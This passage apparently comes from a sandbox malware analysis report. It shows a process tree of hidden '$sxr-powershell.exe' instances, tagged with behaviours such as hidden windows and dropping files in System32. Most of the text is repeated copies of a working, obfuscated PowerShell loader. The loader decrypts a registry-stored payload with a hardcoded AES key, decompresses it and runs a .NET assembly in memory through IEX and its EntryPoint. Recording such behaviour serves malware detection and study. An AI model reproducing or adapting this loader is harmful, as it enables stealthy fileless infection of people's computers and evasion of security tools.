$mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        
        PID:6524
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        
        PID:6092
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        Checks computer location settings
        Hide Artifacts: Hidden Window
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:4944
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        
        PID:824
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = 